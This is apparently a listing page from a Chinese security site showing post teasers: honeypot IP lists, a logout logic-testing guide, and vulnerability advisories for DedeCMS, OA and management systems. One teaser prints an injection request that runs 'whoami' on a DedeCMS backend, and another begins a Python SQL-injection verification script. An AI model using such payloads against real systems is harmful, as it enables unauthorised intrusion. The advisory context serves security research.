通知图标

欢迎访问秃兔安全

【2025你懂的】第三十一期情报 蜜罐陷阱IP_秃兔安全

【2025你懂的】第三十一期情报 蜜罐陷阱IP

IP类别地理位置112.126.77.215蜜罐陷阱IP中国 北京120.25.189.254蜜罐陷阱IP中国 广东 深圳47.243.124.21蜜罐陷阱IP中国 香港156.244.11.6蜜罐陷阱IP沙特阿拉伯47.119.22.156蜜罐陷阱IP中国 广...
【渗透文库】注销场景业务逻辑测试_秃兔安全

【渗透文库】注销场景业务逻辑测试

测试描述:通过抓包工具分析注销场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 业务场景...
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞_秃兔安全

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
7个月前
06315
福建科立讯通信 指挥调度管理平台ajax_users存在SQL注入漏洞_秃兔安全
金和OA_jc6_Upload任意文件上传_秃兔安全
H3C网络管理系统任意文件读取漏洞_秃兔安全
捷诚管理信息系统 SQL注入漏洞_秃兔安全

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容
7个月前
0955
金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞_秃兔安全
蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入_秃兔安全
紫兔网络安全流量日志自动化分析研判_秃兔安全

紫兔网络安全流量日志自动化分析研判

2025 基于只能分析BT日志的紫兔BT日志分析V1重构紫兔网络安全流量日志自动化分析研判V2 V3版本完成火山引擎的Deepseek-R1接入 + 增加实时可视化图表(饼图+曲线图) + 在原有规则基础上增加 31 ...
4个月前
011307

秃兔音乐盒